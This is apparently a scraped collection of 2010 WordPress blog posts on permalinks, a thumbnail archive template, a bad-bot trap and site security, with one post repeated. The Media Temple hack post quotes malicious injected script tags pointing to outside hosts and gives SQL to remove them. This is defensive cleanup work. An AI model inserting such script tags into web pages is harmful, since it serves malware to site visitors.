Just another Freebytes.eu weblog

DiW v3.0 Book News

We have been working diligently on updating Digging into WordPress and finding the best print-on-demand solution. Thanks to your suggestions and ideas for book printing, there were many options to check out. After sizing things up, we’re pleased to announce the following:

  • Digging into WordPress version 3.0 will be released near the end of August
  • Printed editions of DiW will be available in September

We’re still working out the specifics regarding cost, shipping, and so forth, but the book will be updated soon and printed books are back on the menu. So that’s the plan at this point – no hard promises but rather strong goals for DiW v3.0.

As always, stay tuned for more news!

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 2 comments | Add to
Delicious
Categorized: Site News | Tagged: ,

Thumbnail Based Archives

Here at Digging Into WordPress, we’ve attached thumbnail images to every single (non-link-style) post since day one. We started before WordPress 3.0 had the specific feature for thumbnails. We did it just by attaching a file path to the thumbnail image as a custom field. We clearly display each of those thumbnails in the design of the homepage and other various pages where it makes sense.

The biggest reason we decided to attach post thumbnails from the beginning was that it is just an interesting bit of data to have available for every single post. It means that we could do something like display random thumbnails in the sidebar, or display thumbnails next to search results. We don’t do either of those things in this current design, but it’s always a possibility and possibilities are awesome.

Another thing that is a cool thing to build with thumbnails is unique archive views. I’ve built one for us here on Digging Into WordPress and I have some ideas for several more. Check it out:

Read on for the “how”…

1. Created a special page template

This page will be totally unique, no standard header or footer, so I made a template just for it.

<?php
/*
  Template Name: Thumb Archives - Horz
*/
?>

2. Creating a horizontal row of thumbs

One of the best ways to create long horizontal row (that breaks the width of the browser window width) is to use a table with a single row of cells. This way we don’t have to manually set the width of anything, and also don’t have to worry about things wrapping as we would if the thumbnails were inline elements or floated.

So we’ll set up a loop querying for every single post on the site (that isn’t a link-post) and spit out a table cell for each. Within that table cell, there will be an anchor link pointing to the post which contains a title, the image, and an excerpt.

<table id="archives-table">
	<tr>
		<?php query_posts('posts_per_page=-1&cat=-52'); ?>
		<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
		<td>
			<a href="<?php the_permalink(); ?>" class="article-block">
				<span class="title"><?php the_title(); ?></span>
				<img src="<?php echo get_post_meta($post->ID, 'PostThumb', true); ?>" alt="" />
				<span class="ex"><?php the_excerpt(); ?></span>
			</a>
		</td>
		<?php endwhile; endif; ?>
	</tr>
</table>

3. Dependencies

We’re going to need a unique CSS file to use for this. Since this template is completely one-off and we aren’t using the standard header, the <head> element will be right in this template. We’ll link out to our own custom CSS file, load in jQuery, and load in some plugins that will facilitate the idea I’m trying to accomplish (hoverflow and mousewheel), as well as finally our own custom JavaScript file.

<head>
  <meta charset="UTF-8" />
  <title>Thumbnail Archives | Digging Into WordPress</title>
  <link rel="stylesheet" type="text/css" media="all" href="<?php bloginfo("template_url"); ?>/css/archives-horz.css" />
  <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/jquery.hoverflow.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/jquery.mousewheel.min.js'></script>
  <script src='<?php bloginfo("template_url"); ?>/js/weirdarchives.js'></script>
</head>

If this page was anything more than a one-off page, we should be enqueuing scripts and providing proper hooks in the header and such. I’ve specifically not done that here because this page is it’s own unique thing that I don’t want anything else intruding upon.

4. Style

The styling for page is very simple, just a repeating background image and resets. Notice on the page though that the titles and excerpts are hidden until the mouse hovers over the thumbnails. We’ll do the “hiding” by setting the opacity of the thumbnails down to zero in the CSS. We’ll also position them inset into the thumbnail a bit so they have a bit more dramatic “reveal” upon mouse hover, as they slide out and into place.

.title { bottom: 50%; }
.ex { top: 50%; font: 11px Georgia, Serif; color: #555; }
.title, .ex { background: white; width: 130px; padding: 10px; display: block; overflow: hidden; position: absolute; opacity: 0; }

5. Horizontal scrolling

With the mousewheel plugin in place, we can force the window to scroll horizontally instead of vertically with mouse scrollwheels with this:

$("body").mousewheel(function(event, delta) {
    this.scrollLeft -= (delta * 30);
    event.preventDefault();
});

6. Animation

When a thumbnail is hovered over, the title and except will show themselves and slide down. To do that, I’m using jQuery’s hover function which accepts a function to run on mouseenter and a function to run on mouseleave. For the former, an animation begins which moves the position, height, and opacity. The latter, those values are returned to how they started.

$blocks.hover(function(e) {
    var $el    = $(this),
        $title = $el.find(".title"),
        $ex    = $el.find(".ex");

    $title.hoverFlow(e.type, { bottom: "99%", opacity: 1, height: $title.data("origHeight") })
    $ex.hoverFlow(e.type, { top: "95.5%", opacity: 1, height: $ex.data("origHeight") });

}, function(e) {
    $(this)
        .find(".title").hoverFlow(e.type, { bottom: "50%", opacity: 0, height: 0 })
        .end()
        .find(".ex").hoverFlow(e.type, { top: "50%", opacity: 0, height: 0 });
});

There is a bit more to the JavaScript (but not much), feel free to poke your way around to it from the demo page to see it all.

7. More

The point of all this was to create a unique archive browsing experience based around our thumbnails. This isn’t the only way to do it. In fact I have a few other ideas I’m going to work on in time. Are they super practical? Maybe not, but they are fun!

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 10 comments | Add to
Delicious
Categorized: Design | Tagged: ,

Optimizing WordPress Permalinks

Configuring your WordPress permalinks is simple and only takes a second, but understanding what they are and how they work is key to setting up the best permalink structure possible. Your site’s permalinks are like the street address for your site’s web pages. They help both people and robots understand your site’s structure and navigate its contents. There is no “one magic permalink recipe to rule them all,” but keeping a few tips in mind makes it easy to optimize your WordPress permalinks. This DiW article shows you how..

WordPress makes it so easy

WordPress gives you full control over your permalinks. First, you have control over the general structure of your permalinks. Navigate to Settings > Permalinks and you will see several options for configuring your permalinks:

[ Screenshot: WP Permalink Settings ]

This is where you configure the general structure of your permalinks, as seen here with green underline. The portion underlined in red is post/page-specific, and will vary depending on your individual posts and pages. For DigWP.com, we chose the “month and name” format, which creates the following permalinks according to page-view:

  • Pageshttp://digwp.com/about/
  • Tag Archiveshttp://digwp.com/tag/permalinks/
  • Category Archiveshttp://digwp.com/category/seo/
  • Single Postshttp://digwp.com/2010/05/wordpress-json-api-plugin/

..and so on. The main thing that you want to optimize at this point is the structure of your single-post permalinks. We chose to include the year and month for our posts, but it has been argued that it is better to omit the date entirely, using a “Custom structure” like so:

/%postname%/

This simple structure will produce single-post permalinks that include only the post name:

http://digwp.com/wordpress-json-api-plugin/

Without the additional date information, this structure is definitely shorter and cleaner, but there may be performance issues involved with using the “name-only” permalink format. Perhaps a good trade-off is to include either the post ID or the year:

/%post_id%/%postname%/
/%year%/%postname%/

I think either of these formats is probably an optimal way to configure your permalinks, but you also want to consider the frequency with which you’ll be posting content. It may be beneficial to further organize/classify your posts by including the month and day as well.

Certain “experts” will tell you that including extraneous date information is bad for SEO. The thinking here is that shorter URLs correspond to a more “flat” directory structure, which may provide some SEO benefits. I think the key is to use what’s necessary and omit any extraneous information.

Post/page-specific permalink structures (slugs!)

Once you’ve defined the general permalink structure in the WordPress Admin, you now have full control over your post-specific and page-specific permalink structures (as seen in the above screenshot, red underline). The part of your permalinks that is specific to each page or post is set in the Write/Edit Post screen in the WordPress Admin.

[ Screenshot: WordPress Post Slugs ]

As shown in the above screenshot, WordPress provides an “Edit” button that enables you to modify the post-specific portion of your permalinks:

[ Screenshot: Editing Post Slugs ]

This feature enables you to customize your post/page-specific permalinks (also known as a post “slug”) according to your current permalink optimization strategy. Here are a few examples of commonly employed “post-slug” strategies:

Don’t even worry about it
Just let WordPress generate the post-specific slug based on the post or page title. Pros: this is certainly the easiest method of creating permalinks because no thought or action is required. Cons: depending on your post title, you could get some pretty long permalinks that look awkward and sloppy.
Remove extraneous words, leave only keywords
I have seen lots of blogs do this. It basically involves using the permalink that WordPress generates based on your title, then going in and removing words like “the”, “and”, and “you”, as well as other pronouns and such. Basically the idea is to leave only keywords in your permalinks. This helps keep them short, focused, and optimized for the search engines.
Customize every permalink with optimized keywords
This is the most labor-intensive strategy, but also potentially the most lucrative in terms of return on investment. The idea here is to research or otherwise understand which keywords your page is going to rank for, and then crafting a post-specific permalink structure based on those keywords. I have seen cases where this is taken to such an extreme that the post slug is completely different than the original post title.

The same goes for both posts and pages, regardless of which method you choose. Personally, I employ a combination of the first two strategies, whereby I go in, write a title, and then look at it and see if there is anything that could be improved. Usually there are several words that need to go, and possibly a keyword or two is added or removed. It’s funny because I usually end up rewriting some of the post content after spending some time actually thinking about what to name it.

There is always a better title than the one you think should be used.

The take-home message here is that, by paying attention to post titles and permalinks, you benefit from improved relevancy and potential SEO advantage.

Think of your users

When visitors land on your page, does the URL make sense? Does it correlate with the page title? These are some of the things to think about while setting up the general structure and post-specific slugs for your permalinks. Look at the permalink and ask yourself if it makes complete sense based on what the user will be looking at on the page. If you get too carried away with optimization, a user may get a sense that something isn’t quite right. Perhaps the post title says something like:

The Best Name-Brand Shoes

..but then the post slug looks something like this:

http://example.com/nike-adidas-reebok-zip-converse-shoes/

Perhaps a weak example, but it serves to illustrate the semantic gap that may occur when over-thinking your permalinks.

Think of the search engines

After considering your users, think about what the search engines are going to see when they come crawling your pages. Does the permalink match the content of the page? If you aren’t bothering with changing or optimizing your post slugs, then the answer is probably yes because WordPress generates the slug from the post title.

Also, as mentioned previously, some have argued in favor of a more “flat” directory structure in order to improve the SEO value of your blog. Whether or not this is actually the case is up for discussion, but it always makes sense to keep things as simple and concise as possible. So when deciding on the general structure for your permalinks, ask yourself if you really need a directory structure that is over three levels deep, like this:

domain/
	2010/
	      01/
		  1/
			post-slug-1
			post-slug-2
			post-slug-3
		  2/
			post-slug-4
			post-slug-5
			post-slug-6
		  3/
			post-slug-7
			post-slug-8
			post-slug-9
	      .
	      .
	      .
	2011/
	2012/

That’s going to give you some long permalinks, especially if you just use the default WordPress-generated slugs. When you look at a permalink using “year/month/name” format, you are essentially creating a virtual folder structure with a subdirectory for each part of the permalink – the year represents a directory in which you have a bunch of directories for each month, and within each of those directories there could be as many as 31 subdirectories for each day of the month. Then, within each day of the month, you have the post file itself, which may involve further subdirectories when paging is used. It can get crazy pretty quickly, and even though these subdirectories only exist virtually, to a search spider, there is no practical difference between virtual directories that are deeply nested and actual directories that are deeply nested.

When deciding on your permalink structure, ask yourself if you really need the date built into your permalinks. If you are posting prolifically, then you may want to include the date to help keep things organized. Anything less than a few posts a week, and I would opt to go with something simpler, like maybe “year/post” or “id/post”, as mentioned above.

Another thing that needs considering is the notion of “evergreen content”, which generally refers to content that is intended to stay “fresh” or relevant forever. Regardless how silly this SEO idea happens to be, you may want to consider either omitting or including some sort of date information based on how easily you want the publication date to be recognized by your visitors. I.e., if you are trying to “hide” the post date in hopes that your content will rank for a longer period of time, then you should omit it from the general permalink structure. Conversely, if you aren’t that slimy and want to make it easy for people to know when the post was produced, then throw a year or year/month into the mix. Whatever!

Think simplicity

When it comes to organizing the content of your site, there is a fine balance between being well-organized and keeping things simple. For example, the simplest structure would involve all posts and pages directly under the root domain. Clean and simple, but as time goes on and your post count gets into the hundreds or thousands, it could be a drag trying to sort through everything in a flat directory structure. Thus, another reason why breaking things down into categories or dates may help your long-term organizational and maintenance strategy.

For the post-specific portion of the permalinks (the post slug), it is also wise to keep things simple, but not at the risk of duplicating post names. For example, if you are writing a post about jQuery, you might have a post slug that is simply “jquery”, but it’s not going to be very helpful. First, it probably will never rank for that term. Second, telling users that the article is about “jQuery” is about as useless as it gets for both people and machines. So although that would be the simplest permalink possible, it is your interest to specify a little more clearly the content of your post. It just makes everything easier when meaning is readily available from your permalinks.

Do it before posting

Once you hit the “Publish” button, there is one thing that you shouldn’t change: the post slug. After publishing a post, you can easily and without consequence go back and change the title, meta title, post content, and just about everything else. But as soon as you change that permalink, you will need to 301 redirect the former URL to the new one in order to avoid perpetual 404 errors now and in the future. But, if you do need to change the permalink after posting, here is a simple line of HTAccess to help you eliminate any potential 404 errors:

Redirect 301 /old-post-slug/ http://example.com/new-post-slug/

So it’s really very simple: we first call the redirect directive, declare it as status 301 (permanent), and then add the old slug followed by the new one. That line will redirect any requests for your previously “slugged” URL to your new URL. For more information on htaccess redirects, check here and here.

Think of the keywords

As discussed, a great way to create focused, relevant permalinks is to remove the fluff and include only the important keywords. Granted, Google et al may already discount simple words such as “if”, “and”, and “the”, but you may also have keywords for which you don’t necessarily want to rank. For example, if you published a post on why Batman is terrible at website design, you may wind up with a auto-generated post slug like this:

batman-sucks-at-website-design

The word “at” should probably go, leaving this:

batman-sucks-website-design

But you may want to rank primarily for the term “website-design”, while “batman” is merely anecdotal, used as example, or whatever. Chances are low that anybody is searching for “batman website design”, but you never know.

WordPress removes stuff too

It should also be noted that WordPress removes certain things from your post/page slugs as well. Namely, any punctuation that is included in your post titles will be removed when WordPress automatically generates the post slug. This is both a good thing and a bad thing, depending on how you look at it. There are certain characters that are not allowed in any URL, so WordPress is wise to remove them for you. On the downside, removal of punctuation and the use of hyphens as replacements for periods can leave you with some rather odd-looking permalinks. For example, when writing about the latest WordPress update, say version 3.1 specifically, writing this as your title:

Introducing WordPress 3.1

..will give you this as the default post slug:

/introducing-wordpress-3-1/

..which to me just looks incorrect, like somebody wasn’t paying attention. Moral of the story: even if you’re too lazy to optimize your permalink slugs, it is wise to be mindful of what’s going on with the auto-generated stuff. In this regard, the WordPress devs made an excellent decision when they decided to move the permalink edit box to just below the post title. I do think it could be a little longer though. Most of the time you need to scroll sideways a bit to see what the entire permalink is looking like.

WordPress short URLs

What about Twitter-friendly “shortlinks” for your posts? Generally even the shortest permalink is going to be too long for tweeting, posting, sharing, etc. There are many ways to create short links, but WordPress actually has two built-in ways to create and display short URLs. Let’s take a look at each:

First is the “old” way of doing it. By default, WordPress uses a query-string format for your URLs. As discussed throughout this article, most WordPress users opt for the “pretty” permalinks instead of going with the “ugly” default URLs. But even when permalinks are used, WordPress still understands the default query-string URL structure, so you can include short links in your posts by doing something like this:

<?php echo get_bloginfo('url')."/?p=".$post->ID; ?>

Shortlinks have become so common that WordPress 3.0 now includes a built-in template tag for this very purpose. All you need to display shortlinks in WordPress 3 and above is include the following code in your theme template file(s):

<?php the_shortlink('link text', 'link title', 'before link', 'after link'); ?>

Either of these methods will output a link with the following URL structure:

http://example.com/?p=77

Also note that WordPress 3.0 now includes a shortlink in the <head> section of your posts and pages, something like this:

<link rel='shortlink' href='http://example.com/?p=77' />

This is in addition to the canoncial link tag that is also included in the <head> section.

WordPress canonical links

WordPress canonical URLs are included in the <head> section of your posts and pages. They look like this:

<link rel='canonical' href='http://example.com/post-slug/' />

These canonical links help the search engines better understand the structure and content of your site. By including the canoncial element in your pages, you are telling Google et al which pages are the actual, canonical pages for your site. There are several cases where this is extremely helpful, namely:

  • Social media linking often involves shortlinks – specifying a canonical link helps ensure that all of the shortlinking is sorted out and that your actual page gets the credit
  • Shopping cart sites that feature lots of query-string URLs – when many links look practically identical, having a canonical link specified helps to sort things out
  • Guest posting and other duplicate content – when your content is featured (or scraped) in multiple places around the Web, it is nice to have a clear signal as to which case is canonical

You don’t need htaccess to make changes

What if you want to change the general structure of your permalinks? How do you go about doing that without losing your page rank while creating a mess of 404 errors? In older versions of WordPress, this was a real concern. Many folks began with full-date permalinks and then later realized they wanted cleaner, shorter, “dateless” permalinks instead. To do this back in the day, some HTAccess trickery was required to keep the old links from going nowhere.

Fortunately those days are long gone, as WordPress now automagically handles all the redirecting for you when making changes to the general structure of your permalinks (via the Settings > Permalinks options in the WordPress Admin). All you need to do is change the setting to whatever structure you would like and WordPress takes care of the rest. Just remember to backup your database and htaccess file before making any changes.

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 30 comments | Add to
Delicious
Categorized: SEO | Tagged: , ,

Media Temple WordPress Hack

It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit. We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:

  • Visitors viewing posts on your blog may be redirected to a third-party site.  This may be a site already blocked by Google.
  • Visitors may  also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for clearing things up, but it doesn’t look like the entry-point or source of this hack is known at this point.

The hack injects a short JavaScript string into your database at the end of each your post’s content. There are (so far) two known variations of the inserted garbage:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="http://ie.eracou.com/3"></script>

To clean this up asap, backup your database and run the following SQL queries:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the query prefix from wp_ to your custom prefix.

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 38 comments | Add to
Delicious
Categorized: Security | Tagged: , ,

GPL Showdown

If you missed the Matt Mullenweg vs. Chris Pearson debate live debate today, this is my wrap up:

Matt: Thesis is violating the law because it violates GPL.
Chris: No it isn’t.

Matt: Businesses can thrive under GPL.
Chris: So?

Matt: Why won’t you bring Thesis over to GPL?
Chris: Because I would feel like I’m doing something against my personal beliefs.

Matt: We might sue you.
Chris: Bring it on.

It was interspersed with various (what I felt to be) personal attacks and chest thumping. No conclusion was come to.

As for me, I don’t know enough to have super strong opinions on all this. I do know that I’d way rather be friendly with the WordPress community and its founding fathers than at odds, so if Matt asked me to do something, I’d generally just do it. Hey, that’s why the domain of this site is digwp.com and not diggingintowordpress.com.

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 7 comments | Add to
Delicious
Categorized: Site News | Tagged:

GPL Showdown

If you missed the Matt Mullenweg vs. Chris Pearson debate live debate today, this is my wrap up:

Matt: Thesis is violating the law because it violates GPL.
Chris: No it isn’t.

Matt: Businesses can thrive under GPL.
Chris: So?

Matt: Why won’t you bring Thesis over to GPL?
Chris: Because I would feel like I’m doing something against my personal beliefs.

Matt: We might sue you.
Chris: Bring it on.

It was interspersed with various (what I felt to be) personal attacks and chest thumping. No conclusion was come to.

As for me, I don’t know enough to have super strong opinions on all this. I do know that I’d way rather be friendly with the WordPress community and its founding fathers than at odds, so if Matt asked me to do something, I’d generally just do it. Hey, that’s why the domain of this site is digwp.com and not diggingintowordpress.com.

Like the article? Get the book!


© 2010 Digging into WordPress | Permalink | 49 comments | Add to
Delicious
Categorized: Site News | Tagged:

Protect Your Site with a Blackhole for Bad Bots

[ Black Hole ] One of my favorite security measures here at Perishable Press is the site’s virtual Blackhole trap for bad bots. The concept is simple: include a hidden link to a robots.txt-forbidden directory somewhere on your pages. Bots that ignore or disobey your robots rules will crawl the link and fall into the trap, which then performs a WHOIS Lookup and records the event in the blackhole data file. Once added to the blacklist data file, bad bots immediately are denied access to your site. I call it the “one-strike” rule: bots have one chance to follow the robots.txt protocol, check the site’s robots.txt file, and obey its directives. Failure to comply results in immediate banishment. The best part is that the Blackhole only affects bad bots: normal users never see the hidden link, and good bots obey the robots rules in the first place.

In five easy steps, you can set up your own Blackhole to trap bad bots and protect your site from evil scripts, bandwidth thieves, content scrapers, spammers, and other malicious behavior.

[ Blackhole Directory with Files ] The Blackhole is built with PHP, and uses a bit of .htaccess to protect the blackhole directory. The blackhole script combines heavily modified versions of the Kloth.net script (for the bot trap) and the Network Query Tool (for the whois lookups). Refined over the years and completely revamped for this tutorial, the Blackhole consists of a single plug-&-play directory that contains the following four files:

  • .htaccess – basic directory protection
  • blackhole.dat – server-writable log file (serves as the blacklist)
  • blackhole.php – checks requests against blacklist and blocks bad bots
  • index.php – generates blackhole page, performs whois lookup, sends email, and logs data

These four files are all contained in a single directory named “blackhole”.

Installation Overview

I set things up to make implementation as easy as possible. Here are the five basic steps:

  1. Upload the /blackhole/ directory to your site
  2. Ensure writable server permissions for the blackhole.dat file
  3. Add a single line to the top of your pages to include the blackhole.php file
  4. Add a hidden link to the /blackhole/ directory in the footer of your pages
  5. Prohibit crawling of the /blackhole/ by adding a line to your robots.txt file

It’s that easy to install on your own site, but there are many ways to customize functionality. For complete instructions, jump ahead to Implementation and Configuration. For now, I think a good way to understand how it works is to check out a demo..

One-time Live Demo

I have set up a working demo of the Blackhole for this tutorial. It works exactly like the download version, but it’s configured to block you only from the demo, not from the entire site. Here’s how it works:

  1. First visit to the Blackhole demo loads the trap page, runs the whois lookup, and adds your IP address to the blacklist data file
  2. Once you’re added to the blacklist, all subsequent requests for the Blackhole demo will be denied access

So you get one chance to see how it works. Once you visit, your IP will be blocked from the demo only – you will still have full access to this tutorial (and everything else). That said, here is the demo link: Blackhole Demo. Visit once to see the Blackhole trap, and then again to observe that you’ve been blocked. If I were to include the blackhole.php in the header of my theme files, you would be banned from pretty much the entire site.

Implementation and Configuration

Here are complete instructions for implementing and configuring the Perishable Press Blackhole:

Step 1: Download the Blackhole zip file, unzip and upload to your site’s root directory. This location is not required, but it enables everything to work out of the box. To use a different location, edit the include path in Step 3.

Step 2: Change file permissions for blackhole.dat to make it writable by the server. The permission settings may vary depending on server configuration. If you are unsure about this, ask your host. Note that the blackhole script needs to be able to read, write, and execute the blackhole.dat file.

Step 3: Include the bot-check script by adding the following line to the top of your pages:

<?php include($_SERVER['DOCUMENT_ROOT'] . "/blackhole/blackhole.php"); ?>

The blackhole.php script checks the request IP against the blacklist data file. If a match is found, the request is blocked with a customizable message. See the source code for more information.

Step 4: Include a hidden link to the /blackhole/ directory in the footer of your pages:

<a style="display:none;" href="http://example.com/blackhole/" rel="nofollow">Do NOT follow this link or you will be banned from the site!</a>

This is the hidden link that bad bots will follow. It’s currently hidden with CSS, so 99% of visitors won’t ever see it. To hide the link from users without CSS, replace the anchor text with a transparent 1-pixel GIF image.

Step 5: Finally, add a Disallow directive to your site’s robots.txt file:

User-agent: *
Disallow: /*/blackhole/*

This step is pretty important. Without the proper robots directives, all bots would fall into the Blackhole because they wouldn’t know any better. If a bot wants to crawl your site, it must obey the rules! The robots rule that we are using basically says, “All bots DO NOT visit the /blackhole/ directory or anything inside of it.” More on this in the next section..

Further customization: The previous five steps will get the Blackhole working, but the index.php requires a few modifications. Open the index.php file and make the following changes:

  • Line #54: Edit the path to your site’s robots.txt file
  • Line #56: Edit the path to your contact page (or email address)
  • Lines #140/141: Edit email address with your own
  • And in blackhole.php, edit line #53 with your contact info

These are the recommended changes, but the PHP is clean and generates valid HTML5, so feel free to modify the source code as needed. Note that beyond these three items, no other edits need made.

Caveat Emptor

Blocking bots is serious business. Good bots obey robots.txt rules, but there may be potentially useful bots that do not. Yahoo is the perfect example: it’s a valid search engine that sends some traffic, but sadly the Yahoo Slurp bot is too stupid to follow the rules. Since setting up the Blackhole several years ago, I’ve seen Slurp disobey robots rules hundreds of times. Bottom line: the Blackhole will block any bot that disobeys the robots.txt directives. Proceed accordingly. Update: By default, the Blackhole no longer blocks any of the popular search engines. See the next section for more information.

Whitelisting Search Bots

Initially, the Blackhole blocked any bot that disobeyed the robots.txt directives. Unfortunately, as discussed in the comments, Googlebot, Yahoo, and other major search bots do not always obey robots rules. And while blocking Yahoo! Slurp is debatable, blocking Google, MSN/Bing, et al would just be dumb. Thus, the Blackhole now “whitelists” any user agent identifying as any of the following:

  • googlebot (Google)
  • msnbot (MSN/Bing)
  • yandex (Yandex)
  • teoma (Ask)
  • slurp (Yahoo)

Whitelisting these user agents ensures that anything claiming to be a major search engine is allowed open access. The downside is that user-agent strings are easily spoofed, so a bad bot could crawl along and say, “hey look, I’m teh Googlebot!” and the whitelist would grant access. It is possible to verify the true identity of each bot, but as X3M explains in the comments, doing so consumes significant resources and could overload the server. Avoiding that scenario, the Blackhole errs on the side of caution: it’s better to allow a few spoofs than to block any of the major search engines.

License and Disclaimer

The Perishable Press Blackhole is released under GNU General Public License. Check the Creative Commons for a summary and/or see the Blackhole source code for additional information. Also note that by downloading the Blackhole, you agree to accept full responsibility for its use. In no way shall the author be held accountable for anything that happens after the file has been downloaded.

Blackhole Download

Here you can download the current version of the Blackhole:

Perishable Press Blackhole for Bad Bots
    [ version 1.2 | .zip format | 5K | 251 downloads ]

Previous Versions

Source: Perishable Press

Take your WordPress skills to the next level with Digging into WordPress!

Related articles

WordPress Security Lockdown

This article is split into two parts for ez reference. First some information on the evil WordPress “Pharma Hack”, and then a recipe for protecting your site with a solid security lockdown. Choose your own adventure:

Pharmaceutical Apocalypse

A few weeks ago, DigWP.com was hit with the so-called Pharma Hack. We discovered the hack after some Google results turned up all sorts of spammy pharmaceutical garbage littered throughout posts, links, and titles. The tricky part about the hack is that it injects the spam garbage only when your site’s pages are requested by a search bot (e.g., googlebot). So when you view your pages in a browser, everything seems perfectly normal. Put simply, the hack is cloaked. We had no idea anything was wrong until about two weeks after the attack. During that time a majority of our search engine results were nuked with evil pharma spam. Ick.

Flash forward three weeks later and things are locked-down tight. The Pharma Hack has not returned, and most of the spam garbage in the search results has been filtered out and replaced with clean pages. At the time of the attack, DigWP was running WordPress 2.9/3.0 without any sort of additional site security. We were just using whatever “default” protection available from either WordPress or Media Temple. After detecting the hack, several days were spent cleaning it up and locking things down. At first, it seemed like an impossible hack to fix – nothing seemed to work. We ran through the following routine, hoping to fix it:

  • Locate and remove hacked 404.php file
  • Locate and remove hacked content from database
  • Replace entire set of salt keys
  • Upload new WordPress files
  • Restore previous versions of other files
  • Restore database to previous version

These actions alleviate the symptoms, but they don’t even touch the actual virus, which somehow regenerates the (base64) encoded spam script. As far as we know, the Pharma Hack works like this:

  1. Evil script gains access to your WordPress site
  2. Encoded spam script injected into database
  3. Script inserts spam garbage into pages requested by search bots
  4. Script makes no changes to pages requested by browsers

Within the database, the spam script is generated in any/all of these option_name fields:

  • class_generic_support
  • widget_generic_support
  • wp_check_hash
  • ftp_credentials
  • rss_[string] e.g.,
    rss_7988287cd8f4f531c6b94fbdbc4e1caf

If these fields are present and contain super-long strings of encoded gibberish, your site’s infected. You can assess the damages by examining the search results for your site (note: other spam keywords may be used):

site:digwp.com cipro OR meridia OR cialis

If you’re hit, hopefully you catch it before googlebot crawls along. But even if you have thousands of hacked pages appearing in the search index, it’s not too late to clean things up and secure your site. Here is how we did it..

WordPress Security Lockdown

This security strategy is best implemented on new sites. It just makes everything (like renaming table prefixes) so much easier. Either way, you want to start with a clean batch of files. Upload a fresh copy of WordPress, update your plugins, theme files, and so on. You may want to redirect visitors to a maintenance page while you work on your site. That said, here is our five-step Security Lockdown for WordPress:

  1. File Permissions
  2. File Protection
  3. Database Protection
  4. Essential Plugins
  5. Important Details

[1] File Permissions

After uploading fresh files, the next step is to ensure proper file permissions. WordPress defaults to 644 for files and 755 permissions for folders. Make sure these are set properly. While cleaning up, we noticed some crazy permission settings for sensitive files. For example, wp-config.php was set to 777 – executable and writable by the entire world!! Make sure you don’t see anything like that, and if you do, fix it.

[2] File Protection

In addition to setting proper file permissions, we can also lock down key files with .htaccess. There are numerous files to protect, perhaps most importantly the wp-config.php file, which contains your database login information. Place the following code in your site’s root .htaccess file to protect it:

# SECURE WP-CONFIG.PHP
<Files wp\-config\.php>
 Order Deny,Allow
 Deny from all
</Files>

You may also want to password-protect your wp-admin directory, but it may cause more trouble than it’s worth.

[3] Database Protection

Changing the default table prefix is one of the best ways to protect your database. Malicious scripts need targets, and default targets are easy to hit. Change wp_ to something more like a password. Some random string like “crUQZPadESeKSy8Q_” will make your tables difficult to hit. Like having a built-in password for your database :)

There are two ways to change your prefixes: the easy way and the hard way. The easy way is to add the following line to your wp-config.php file before installing WordPress (important: change the random string to something unique):

$table_prefix  = 'crUQZPadESeKSy8Q_'; // custom table prefix

Do that before running the install script and WordPress takes care of the prefix naming automagically when it creates the database. Going forward, there is no reason not to change default prefixes for all future WordPress installs. For existing sites, you can do it the hard way using a plugin or doing it manually.

[4] Essential Plugins

After exploring the vast crop of WP File Monitor

This plugin tracks changes made to your files. If/when anything changes, it notifies you via Admin Dashboard alert and/or email alert. So anytime a file is changed, moved, added, or removed, WP File Monitor lets you know. Here is a list of features:

  • Monitors file system for added/deleted/changed files
  • Sends email when a change is detected
  • Multiple email formats for alerts
  • Administration area alert to notify you of changes in case email is not received
  • Ability to monitor files for changes based on file hash or timestamp
  • Ability to exclude directories from scan
  • Site URL included in notification email in case plugin is in use on multiple sites

This is one of my favorite plugins. It’s perfect for keeping an eye on things. If anyone gets in and messes around with your files, you’ll know about it immediately, and even better, you’ll know exactly which files have been affected.

WP Security Scan

This plugin scans your WordPress installation for security vulnerabilities and suggests corrective actions. The scan report informs you of any problems with file permissions, system variables, and much more:

  • Passwords
  • File permissions
  • Database security
  • Version hiding
  • WordPress admin protection/security
  • Removes WP Generator META tag from core code

WP Security Scan also provides a nice summary of server information and latest scan information. Performing a new scan is immediate with the click of a button. Very easy.

Ultimate Security Check

This plugin provides even more security information, helping you to identify potential issues with your WordPress installation. It scans your site for “hundreds of known threats,” and then “grades” your level of site security. Here are some of the key things it checks:

  • Checks for updates
  • Checks configuration file
  • Checks if config file is located in unsecured place
  • Checks presence of install script
  • Checks server configuration
  • Checks database
  • Checks code

And quite a bit more. The best part about Ultimate Security Check is that it’s so easy to use.

Secure WordPress

This plugin takes care of all those “little” things. Instead of installing a bunch of smaller plugins or custom functions for this stuff, the Secure WordPress plugin does it all for you:

  1. Removes error-information on login-page
  2. Adds index.php plugin-directory (virtual)
  3. Removes the wp-version, except in admin-area
  4. Removes Really Simple Discovery
  5. Removes Windows Live Writer
  6. Remove core update information for non-admins
  7. Remove plugin-update information for non-admins
  8. Remove theme-update information for non-admins (only WP 2.8 and higher)
  9. Hide wp-version in backend-dashboard for non-admins
  10. Block Bad Queries

Having all of this (and much more) done with a few clicks in the WordPress Admin is easy and effective.

[5] Important Details

The previous four steps comprise the majority of our security lockdown, but there are some important details to consider:

  • Keep your WordPress install, plugins, themes, and scripts updated with current versions
  • Use strong passwords and change them often
  • Disable user registration if not needed/used for your site
  • Check roles and permissions for all users
  • Clean up and consolidate old/loose files
  • Remove unused plugins and themes
  • Check permissions of upload, upgrade, and backup directories
  • Keep a backup of your site files
  • Keep your database optimized and backed up

